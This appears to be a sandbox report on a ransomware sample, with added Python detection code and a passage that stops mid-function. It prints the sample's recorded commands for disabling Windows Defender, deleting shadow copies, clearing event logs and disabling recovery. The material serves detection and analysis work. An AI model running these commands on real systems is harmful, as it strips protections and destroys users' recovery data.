| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe
"C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
| Process | Command line |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security |
| C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive |
| C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures |
| C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no |
| C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true |
| C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true |
| C:\Windows\system32\notepad.exe | notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt |
| C:\Windows\system32\cmd.exe | cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe" |
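The command lines above are the sample's pre-encryption sequence as the sandbox recorded it: the Defender drivers and services (WdBoot, WdFilter, WdNisDrv, WdNisSvc, WinDefend, SecurityHealthService) set to start type 4 (disabled), the Defender shell context-menu handler removed, definitions deleted with MpCmdRun.exe, real-time and IOAV protection turned off with Set-MpPreference, shadow copies deleted twice (vssadmin and wmic), the System, Security and Application logs cleared, recovery disabled with bcdedit, the ransom note opened in notepad, and finally self-deletion after a five-ping delay. The following Python is an added example written for this report, not code from the sample or from the sandbox: it maps command lines of this shape to ATT&CK technique ids and flags a trace that shows both defence evasion and recovery inhibition. The regexes are written against the command lines recorded above and widened only to obvious variants (any Defender service name, any event log name, long-form hive names); SAMPLE_TRACE is copied from the list above and BENIGN_TRACE is a constructed set of ordinary invocations of the same tools used as negatives.

```python
"""Map process command lines to ATT&CK techniques, using the trace above as input.

Added example for this report; it is not code from the sample or from the sandbox.
The patterns are written against the exact command lines recorded above and widened
only to obvious variants. BENIGN_TRACE is constructed to exercise the negatives.
"""
from __future__ import annotations

import re

# (technique id, short description, pattern searched anywhere in the command line)
RULES = [
    ("T1562.001", "Defender driver/service Start set to 4 (disabled) via reg.exe",
     re.compile(r'\breg(?:\.exe)?\s+add\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\System\\CurrentControlSet\\Services\\'
                r'(?:WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService)"?'
                r'\s+/v\s+"?Start"?\s+/t\s+REG_DWORD\s+/d\s+"?4"?', re.I)),
    ("T1562.001", "Defender shell context-menu handler (EPP) removed via reg.exe",
     re.compile(r'\breg(?:\.exe)?\s+delete\s+"?(?:HKCR|HKEY_CLASSES_ROOT)\\(?:\*|Directory|Drive)'
                r'\\shellex\\ContextMenuHandlers\\EPP"?', re.I)),
    ("T1562.001", "Defender signature definitions removed via MpCmdRun.exe",
     re.compile(r'MpCmdRun\.exe"?\s+-RemoveDefinitions\s+-All', re.I)),
    ("T1562.001", "Defender real-time/IOAV protection disabled via Set-MpPreference",
     re.compile(r'Set-MpPreference\s+-Disable(?:RealtimeMonitoring|IOAVProtection)\s+\$true', re.I)),
    ("T1490", "Volume shadow copies deleted",
     re.compile(r'(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)', re.I)),
    ("T1490", "Windows recovery disabled via bcdedit",
     re.compile(r'bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+'
                r'(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("T1070.001", "Windows event log cleared via wevtutil",
     re.compile(r'wevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\w+', re.I)),
    ("T1070.004", "Self-deletion after a ping delay",
     re.compile(r'ping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\s*&&\s*del\s+', re.I)),
]

# Tactic per technique id; the verdict below needs both tactics in one trace.
TACTIC = {"T1562.001": "Defense Evasion", "T1070.001": "Defense Evasion",
          "T1070.004": "Defense Evasion", "T1490": "Impact"}

# Command lines copied from the trace above.
SAMPLE_TRACE = [
    r'reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wevtutil.exe cl security',
    r'wmic.exe SHADOWCOPY /nointeractive',
    r'wmic.exe shadowcopy delete',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'notepad.exe C:\vyS2_HOW_TO_DECRYPT.txt',
    r'cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe"',
]

# Constructed benign command lines: same tools, none of the hostile verbs.
BENIGN_TRACE = [
    r'reg.exe query "HKLM\System\CurrentControlSet\Services\WinDefend" /v Start',
    r'vssadmin.exe list shadows',
    r'wevtutil.exe qe Security /c:5 /rd:true',
    r'bcdedit.exe /enum {default}',
    r'ping.exe -n 1 127.0.0.1',
]


def classify(cmdline: str) -> list[tuple[str, str]]:
    """Return (technique id, description) for every rule that matches one command line."""
    return [(tid, desc) for tid, desc, rx in RULES if rx.search(cmdline)]


def triage(cmdlines: list[str]) -> dict:
    """Aggregate rule hits over a process trace and flag the evasion + recovery-inhibition combination."""
    hits = [(tid, desc, c) for c in cmdlines for tid, desc in classify(c)]
    techniques = {tid for tid, _, _ in hits}
    tactics = {TACTIC[tid] for tid in techniques}
    return {
        "hits": hits,
        "techniques": techniques,
        "tactics": tactics,
        # Defence evasion plus recovery inhibition in one trace is the pattern shown above.
        "ransomware_like": {"Defense Evasion", "Impact"} <= tactics,
    }


if __name__ == "__main__":
    for name, trace in (("sample", SAMPLE_TRACE), ("benign", BENIGN_TRACE)):
        result = triage(trace)
        print(f"{name}: ransomware_like={result['ransomware_like']} techniques={sorted(result['techniques'])}")
        for tid, desc, cmd in result["hits"]:
            print(f"  {tid} {desc}: {cmd}")
```

Run over a real host's process-creation events (Sysmon event 1 or Security 4688 with command-line auditing), the same rules should fire on the CommandLine field; the verdict is deliberately a conjunction of two tactics so that a lone `vssadmin list shadows` or a single `wevtutil cl` from an administrator does not trip it.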
Network
Files
memory/1452-54-0x0000000000000000-mapping.dmp
memory/760-55-0x0000000000000000-mapping.dmp
memory/428-56-0x0000000000000000-mapping.dmp
memory/1060-57-0x0000000000000000-mapping.dmp
memory/592-58-0x0000000000000000-mapping.dmp
memory/1596-59-0x0000000000000000-mapping.dmp
memory/1836-60-0x0000000000000000-mapping.dmp
memory/432-61-0x0000000000000000-mapping.dmp
memory/1804-62-0x0000000000000000-mapping.dmp
memory/1876-63-0x0000000000000000-mapping.dmp
memory/1040-64-0x0000000000000000-mapping.dmp
memory/1504-65-0x0000000000000000-mapping.dmp
memory/1568-66-0x0000000000000000-mapping.dmp
memory/952-67-0x0000000000000000-mapping.dmp
memory/1776-68-0x0000000000000000-mapping.dmp
memory/1624-69-0x0000000000000000-mapping.dmp
memory/968-70-0x0000000000000000-mapping.dmp
memory/1288-71-0x0000000000000000-mapping.dmp
memory/1752-72-0x0000000000000000-mapping.dmp
memory/1732-73-0x0000000000000000-mapping.dmp
memory/1276-74-0x0000000000000000-mapping.dmp
memory/2028-75-0x0000000000000000-mapping.dmp
memory/1564-76-0x0000000000000000-mapping.dmp
memory/1924-77-0x0000000000000000-mapping.dmp
memory/1708-78-0x0000000000000000-mapping.dmp
memory/268-79-0x0000000000000000-mapping.dmp
memory/1036-80-0x0000000000000000-mapping.dmp
memory/564-81-0x0000000000000000-mapping.dmp
memory/1596-82-0x0000000000000000-mapping.dmp
memory/808-83-0x0000000000000000-mapping.dmp
memory/1168-84-0x0000000000000000-mapping.dmp
memory/660-85-0x0000000000000000-mapping.dmp
memory/1152-86-0x0000000000000000-mapping.dmp
memory/1524-87-0x0000000000000000-mapping.dmp
memory/1392-88-0x0000000000000000-mapping.dmp
memory/1620-89-0x0000000000000000-mapping.dmp
memory/560-90-0x0000000000000000-mapping.dmp
memory/1244-91-0x0000000000000000-mapping.dmp
memory/912-92-0x0000000000000000-mapping.dmp
memory/1044-93-0x0000000000000000-mapping.dmp
memory/888-94-0x0000000000000000-mapping.dmp
memory/884-95-0x0000000000000000-mapping.dmp
memory/1616-96-0x0000000000000000-mapping.dmp
memory/1824-97-0x0000000000000000-mapping.dmp
memory/1852-98-0x0000000000000000-mapping.dmp
memory/1320-99-0x0000000000000000-mapping.dmp
memory/612-100-0x0000000000000000-mapping.dmp
memory/2000-101-0x0000000000000000-mapping.dmp
memory/1696-102-0x0000000000000000-mapping.dmp
memory/924-103-0x0000000000000000-mapping.dmp
memory/1744-104-0x0000000000000000-mapping.dmp
memory/1612-105-0x0000000000000000-mapping.dmp
memory/760-106-0x0000000000000000-mapping.dmp
memory/744-107-0x0000000000000000-mapping.dmp
memory/1816-108-0x0000000000000000-mapping.dmp
memory/1504-109-0x0000000000000000-mapping.dmp
memory/1872-110-0x0000000000000000-mapping.dmp
memory/540-111-0x0000000000000000-mapping.dmp
memory/1760-112-0x0000000000000000-mapping.dmp
memory/1760-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp
memory/1060-114-0x0000000000000000-mapping.dmp
memory/1928-116-0x0000000000000000-mapping.dmp
memory/1748-118-0x0000000000000000-mapping.dmp
memory/812-119-0x0000000000000000-mapping.dmp
memory/1920-120-0x0000000000000000-mapping.dmp
memory/1868-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp
memory/1868-124-0x0000000002412000-0x0000000002414000-memory.dmp
memory/1868-126-0x000000000241B000-0x000000000243A000-memory.dmp
memory/1868-125-0x0000000002414000-0x0000000002417000-memory.dmp
memory/1868-123-0x0000000002410000-0x0000000002412000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | b8e610b2334f1c528aa7ec5b8c07f1e4 |
| SHA1 | 3583b173c98b14b9fc18c798cecd94fd9889fb31 |
| SHA256 | 187b9e01b982fce924b1c7182002c48cd192205e7b2c2d86ea9c11264bee1792 |
| SHA512 | 743f07cd92debbcbee136af8b2e6e2921e89d6ccd10884a89417448cb378777b086632c6ddab05d02920f7ca9845c86163af0eded72afc8a66bcf1fa887e8494 |
memory/2136-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp
memory/2136-130-0x000000001B7C0000-0x000000001BABF000-memory.dmp
memory/2136-133-0x0000000002804000-0x0000000002807000-memory.dmp
memory/2136-132-0x0000000002802000-0x0000000002804000-memory.dmp
memory/2136-131-0x0000000002800000-0x0000000002802000-memory.dmp
memory/2136-134-0x000000000280B000-0x000000000282A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 19:26
Reported
2022-01-12 19:31
Platform
win10-en-20211208
Max time kernel
186s
Max time network
224s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SYSTEM32\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\bcdedit.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CompareSkip.tif => C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MoveComplete.png => C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterUnlock.png => C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyRename.crw => C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OpenCompress.tiff => C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitOpen.png => C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitOut.crw => C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeRestore.tiff => C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm | C:\Users\Admin\AppData\Local\Temp\c81917d8fe42d7d84686c3caedbb911d2d5dcbd2d1e0fec64b66b3301cad5a15.exe | N/A |
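Every renamed file in the table above has the form `<original name>.<43 characters>_<12 characters>.8zvpm`: the 43-character field is identical for every file in this report (including the Program Files entries further down), the 12-character field differs per file, and both fields use only the base64url alphabet. The Python below is an added example for this report, not code from the sample or from the sandbox; it parses that observed layout, assigns no meaning to either field, summarises the rename burst per directory and original extension, and builds a regex for hunting further files renamed by the same run on other hosts. RENAME_EVENTS is copied from the table above; the two ordinary renames at the end are constructed negatives.

```python
"""Parse the encrypted-file names recorded above and summarise the rename burst.

Added example for this report; it is not code from the sample or from the sandbox.
Layout parsed: <original name>.<43 base64url chars>_<12 base64url chars>.8zvpm, exactly
as the names above appear. No meaning is assigned to the two fields.
"""
from __future__ import annotations

import re
from collections import Counter
from pathlib import PureWindowsPath

EXTENSION = "8zvpm"
ENCRYPTED_NAME = re.compile(
    r"^(?P<orig>.+?)\.(?P<run>[A-Za-z0-9_-]{43})_(?P<file>[A-Za-z0-9_-]{12})\." + EXTENSION + r"$"
)

# (old path, new path) rename events copied from the table above, plus two constructed
# ordinary renames that a detection must not count.
RENAME_EVENTS = [
    (r"C:\Users\Admin\Pictures\CompareSkip.tif",
     r"C:\Users\Admin\Pictures\CompareSkip.tif.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Y3FMCwdwYPg0.8zvpm"),
    (r"C:\Users\Admin\Pictures\MoveComplete.png",
     r"C:\Users\Admin\Pictures\MoveComplete.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mjJ5vmBhLmg0.8zvpm"),
    (r"C:\Users\Admin\Pictures\RegisterUnlock.png",
     r"C:\Users\Admin\Pictures\RegisterUnlock.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_g4LpNxXGly00.8zvpm"),
    (r"C:\Users\Admin\Pictures\DenyRename.crw",
     r"C:\Users\Admin\Pictures\DenyRename.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_mmup_e1pz7A0.8zvpm"),
    (r"C:\Users\Admin\Pictures\OpenCompress.tiff",
     r"C:\Users\Admin\Pictures\OpenCompress.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_7hO2a7hMKL80.8zvpm"),
    (r"C:\Users\Admin\Pictures\SubmitOpen.png",
     r"C:\Users\Admin\Pictures\SubmitOpen.png.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_zJEq2wjIOyY0.8zvpm"),
    (r"C:\Users\Admin\Pictures\WaitOut.crw",
     r"C:\Users\Admin\Pictures\WaitOut.crw.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_WbaKp_VMsOs0.8zvpm"),
    (r"C:\Users\Admin\Pictures\RevokeRestore.tiff",
     r"C:\Users\Admin\Pictures\RevokeRestore.tiff.uHIy0VIAgxYJb4OaRfA4oZ0av9yCaFP2B8DGKAk289L_Ael394oL5ZY0.8zvpm"),
    (r"C:\Users\Admin\Documents\report.docx", r"C:\Users\Admin\Documents\report-final.docx"),
    (r"C:\Users\Admin\Downloads\setup.tmp", r"C:\Users\Admin\Downloads\setup.exe"),
]


def parse_encrypted_name(path: str) -> dict | None:
    """Split a path into original name, run field and per-file field; None if not in the observed layout."""
    m = ENCRYPTED_NAME.match(PureWindowsPath(path).name)
    if m is None:
        return None
    return {
        "directory": str(PureWindowsPath(path).parent),
        "original": m["orig"],
        "original_ext": PureWindowsPath(m["orig"]).suffix,
        "run_id": m["run"],
        "file_id": m["file"],
    }


def summarize_renames(events: list[tuple[str, str]]) -> dict:
    """Count encrypted renames per run field, directory and original extension; the rest is 'unmatched'."""
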